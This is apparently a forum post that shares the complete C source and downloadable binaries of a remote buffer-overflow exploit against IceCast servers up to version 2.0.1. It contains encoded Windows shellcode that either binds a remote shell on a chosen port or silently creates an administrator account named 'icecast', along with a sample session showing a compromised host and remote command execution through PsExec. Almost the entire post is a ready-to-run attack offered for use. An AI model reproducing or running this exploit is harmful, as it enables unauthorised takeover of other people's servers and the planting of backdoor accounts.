Agathos asked me to post this here so here's the source and the compiled binaries
/**
** IceCast <= 2.0.1 Exploit v1.1
** Fix Exploit by cyrex
** ------------------------------
**
** Now Working Version:
**
** C:\>icecast
** *****************************************
** ** - IceCast <= 2.0.1 Remote Exploit -
** ** - by cyrex -
** ** --> usage: (null) <parm>
** ** ->> -h <hostname>
** ** ->> -p <port>
** ** ->> -b <bindport for BindShell>
** ** ->> -t <type>
** ** ->> 1 = Add's a user Name=icecast Pass:(filtered)
** ** ->> 2 = Binds a Shell on a Port
**
** C:\>
**
** C:\>icecast -h 127.0.0.1 -p 1024 -b 2004 -t 2
** [*] Resolved Host (127.0.0.1)
** [*] Connecting to Target="127.0.0.1" on port "1024"
** [*] Connected. Generate Exploit
** [*] Done. Sending now the Evil Buffer
** [*] Connecting now to BindShell...
** [*] We are in
** Microsoft Windows XP [Version 5.1.2600]
** (C) Copyright 1985-2001 Microsoft Corp.
**
** C:\Programm Files\IceCast2>
**
** C:\>icecast -h 192.168.1.5 -p 1024 -b 2004 -t 1
** [*] Resolved Host (192.168.1.5)
** [*] Connecting to Target="192.168.1.5" on port "1024"
** [*] Connected. Generate User
** [*] Done. Sending now the Evil Buffer
** [*] User should now be added. Try to use psexec
**
** C:\>net user
**
** Benutzerkonten für \\CYREX
**
** --------------------------------------------------------------------
** Administrator cyrex1 Gast
** Hilfeassistent icecast <-- CREATED SUPPORT_388945a0
** Der Befehl wurde erfolgreich ausgeführt.
**
**
** C:\>
**
** C:\>psexec \\127.0.0.1 -u icecast -p (filtered) cmd.exe
**
** PsExec v1.55 - Execute processes remotely
** Copyright (C) 2001-2004 Mark Russinovich
** Sysinternals - www.sysinternals.com
**
**
** Microsoft Windows XP [Version 5.1.2600]
** (C) Copyright 1985-2001 Microsoft Corp.
**
** C:\WINDOWS\system32>exit
** cmd.exe exited on 127.0.0.1 with error code 0.
**
** C:\>
**
**
**/
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>
unsigned char shellcode[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\x5c\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d"
"\x7c\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24"
"\x10\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24"
"\x4c\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51"
"\x49\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04"
"\xff\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89"
"\xc3\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff"
"\x55\x04\x31\xdb\x53\xff\xd0";
unsigned char user_shellcode[]=
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x69\x63\x65"
"\x63\x61\x73\x74\x20\x66\x75\x63\x6b\x65\x64\x20\x2f\x41\x44\x44"
"\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72"
"\x73\x20\x69\x63\x65\x63\x61\x73\x74\x20\x2f\x41\x44\x44\x00";
unsigned char req1[] =
"GET / HTTP/ 1.0\r\n"
"a\r\na\r\na\r\na\r\na\r\na\r\na\r\na\r\n"
"a\r\na\r\na\r\na\r\na\r\na\r\na\r\na\r\n"
"a\r\na\r\na\r\na\r\na\r\na\r\na\r\na\r\n"
"a\r\na\r\na\r\na\r\na\r\na\r\na\r\n";
unsigned char req2[] =
"\r\n\r\n";
unsigned char Decoder[] =
"\x60\xeb\x03\x5b\x53\xc3\xe8\xf8\xff\xff\xff\x31\xc0\x04\x34\x01"
"\xd8\x50\x5b\x31\xd2\x02\x10\x40\x02\x30\x40\x50\x31\xc0\x04\x41"
"\x28\xc2\x28\xc6\xc0\xe2\x04\x66\xc1\xea\x04\x31\xc0\x30\xf6\x02"
"\x03\x28\x03\x66\x01\x13\x43\x58\x31\xc9\x02\x08\xe0\xd5\x61";
#define BINDSHELL_OFFSET 236
#define TIMEOUT 3
int usage(char *p)
{
printf("*****************************************\n");
printf("** - IceCast <= 2.0.1 Remote Exploit -\n");
printf("** - by cyrex@EFNet -\n");
printf("** --> usage: %s <parm>\n",p);
printf("** ->> -h <hostname>\n");
printf("** ->> -p <port>\n");
printf("** ->> -b <bindport for BindShell>\n");
printf("** ->> -t <type>\n");
printf("** ->> 1 = Add's a user Name=icecast Pass:(filtered)\n");
printf("** ->> 2 = Binds a Shell on a Port\n");
}
int sh (int in, int out, int s)
{
char sbuf[128], rbuf[128];
int i,
ti, fd_cnt,
ret=0, slen=0, rlen=0;
fd_set rd, wr;
fd_cnt = in > out ? in : out;
fd_cnt = s > fd_cnt ? s : fd_cnt;
fd_cnt ++;
for (;;) {
FD_ZERO (&rd);
if (rlen < sizeof (rbuf))
FD_SET (s, &rd);
if (slen < sizeof (sbuf))
FD_SET (in, &rd);
FD_ZERO (&wr);
if (slen)
FD_SET (s, &wr);
if (rlen)
FD_SET (out, &wr);
if ((ti = select (fd_cnt, &rd, &wr, 0, 0)) == (-1))
break;
if (FD_ISSET (in, &rd)) {
if((i = read (in, (sbuf+slen),
(sizeof (sbuf) - slen))) == (-1)) {
ret = -2;
break;
}
else if (i == 0) {
ret = -3;
break;
}
slen += i;
if (!(--ti))
continue;
}
if (FD_ISSET (s, &wr)) {
if ((i = write (s, sbuf, slen)) == (-1))
break;
if (i == slen)
slen = 0;
else {
slen -= i;
memmove (sbuf, sbuf + i, slen);
}
if (!(--ti))
continue;
}
if (FD_ISSET (s, &rd)) {
if ((i = read (s, (rbuf + rlen),
(sizeof (rbuf) - rlen))) <= 0)
break;
rlen += i;
if (!(--ti))
continue;
}
if (FD_ISSET (out, &wr)) {
if ((i = write (out, rbuf, rlen)) == (-1))
break;
if (i == rlen)
rlen = 0;
else {
rlen -= i;
memmove (rbuf, rbuf+i, rlen);
}
}
}
return ret;
}
int main(int argc, char *argv[])
{
struct hostent *he;
struct sockaddr_in client;
int c,
port,
fd,
d,
x,
ret;
int BindPort;
char *hostname;
unsigned char* encodeshell;
u_char evilbuff[2000];
if (argc < 6) {
usage (argv[0]);
return -1;
}
while((c = getopt(argc, argv, "h:p:b:t:")) != EOF) {
switch(c) {
case 'h':
hostname=strdup(optarg);
break;
case 'p':
port=atoi(optarg);
break;
case 'b':
BindPort=atoi(optarg);
break;
case 't':
if(!strcmp(optarg,"1")) {
x=1;
}
if(!strcmp(optarg,"2")) {
x=0;
}
break;
default:
usage (argv[0]);
return 0;
}
}
if((he=gethostbyname(hostname))==NULL)
{
printf("[-] Error: (Resolving Host)\n");
exit(-1);
}
printf("[*] Resolved Host (%s)\n",hostname);
printf("[*] Connecting to Target=\"%s\" on port \"%d\"\n",hostname,port);
if((fd=socket(AF_INET,SOCK_STREAM,0))==-1){
printf("[-] Error: Socket Creation\n");
exit(-1);
}
client.sin_family = AF_INET;
client.sin_port = htons(port);
client.sin_addr = *((struct in_addr *)he->h_addr);
if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
printf("[-] Error: Can't Connect to %s\n",hostname);
exit(-1);
}
if(!x) {
printf("[*] Connected. Generate Exploit\n");
encodeshell = (unsigned char*)malloc( ( sizeof(shellcode) - 1 ) * 2 + 1 );
*(unsigned short*)&shellcode[BINDSHELL_OFFSET] = htons(BindPort);
Encode( shellcode, sizeof(shellcode) - 1, encodeshell );
strcpy(evilbuff,(char*)req1);
strcat(evilbuff,(char*)Decoder);
strcat(evilbuff,(char*)encodeshell);
strcat(evilbuff,(char*)req2);
printf("[*] Done. Sending now the Evil Buffer\n");
d=send(fd,evilbuff,strlen(evilbuff),0);
if(!d)
{
printf("[-] Error: Sending Evil Buffer\n");
exit(-1);
}
printf("[*] Connecting now to BindShell...\n");
sleep(5);
if ((ret = new_tcpConnect (hostname, BindPort, 2000)) < 0) {
printf("[-] Couldnt connect to bindshell, possible reasons:\n");
printf(" 1: Host is firewalled\n");
printf(" 2: Exploit failed\n");
goto out;
}
printf ("[*] We are in\n");
sh (0, 1, ret);
out:
close (ret);
return 0;
}
if(x) {
printf("[*] Connected. Generate User\n");
encodeshell = (unsigned char*)malloc( ( sizeof(user_shellcode) - 1 ) * 2 + 1 );
Encode( user_shellcode, sizeof(user_shellcode) - 1, encodeshell );
strcpy(evilbuff,(char*)req1);
strcat(evilbuff,(char*)Decoder);
strcat(evilbuff,(char*)encodeshell);
strcat(evilbuff,(char*)req2);
printf("[*] Done. Sending now the Evil Buffer\n");
sleep(5);
d=send(fd,evilbuff,strlen(evilbuff),0);
if(!d)
{
printf("[-] Error: Sending Evil Buffer\n");
exit(-1);
}
printf("[*] User should now be added. Try to use psexec\n");
exit(-1);
}
}
int Encode( const unsigned char* pszIn, unsigned int nLen, unsigned char* pszOut )
{
unsigned int n;
for(n = 0; n < nLen; n++ )
{
char cHiPart = ( pszIn[ n ] >> 4 ) & 0xf;
char cLoPart = pszIn[ n ] & 0xf;
pszOut[ ( n * 2 ) ] = cLoPart + 'A';
pszOut[ ( n * 2 ) + 1 ] = cHiPart + 'A';
}
}
int timeout(int fd) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(fd, &fd_read);
err = select(fd + 1, &fd_read, NULL, NULL, &tout);
if(!err) return(-1);
return(0);
}
int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
{
int sock,
flag,
pe = 0;
size_t pe_len;
struct timeval tv;
struct sockaddr_in addr;
struct hostent* hp = NULL;
fd_set rset;
// reslov hosts
hp = gethostbyname (host);
if (NULL == hp) {
perror ("tcpConnect:gethostbyname\n");
return -1;
}
sock = socket (AF_INET, SOCK_STREAM, 0);
if (-1 == sock) {
perror ("tcpConnect:socket\n");
return -1;
}
addr.sin_addr = *(struct in_addr *) hp->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons (port);
/* set socket no block
*/
flag = fcntl (sock, F_GETFL);
if (-1 == flag) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
flag |= O_NONBLOCK;
if (fcntl (sock, F_SETFL, flag) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
if (connect (sock, (const struct sockaddr *) &addr,
sizeof(addr)) < 0 &&
errno != EINPROGRESS) {
perror ("tcpConnect:connect\n");
close (sock);
return -1;
}
/* set connect timeout
* use millisecond
*/
tv.tv_sec = timeout/1000;
tv.tv_usec = timeout%1000;
FD_ZERO (&rset);
FD_SET (sock, &rset);
if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) {
// perror ("tcpConnect:select");
close (sock);
return -1;
}
pe_len = sizeof (pe);
if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {
perror ("tcpConnect:getsockopt\n");
close (sock);
return -1;
}
if (pe != 0) {
errno = pe;
close (sock);
return -1;
}
if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
pe = 1;
pe_len = sizeof (pe);
if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){
perror ("tcpConnect:setsockopt\n");
close (sock);
return -1;
}
return sock;
}
icecast.zip 515.63K
232 downloads
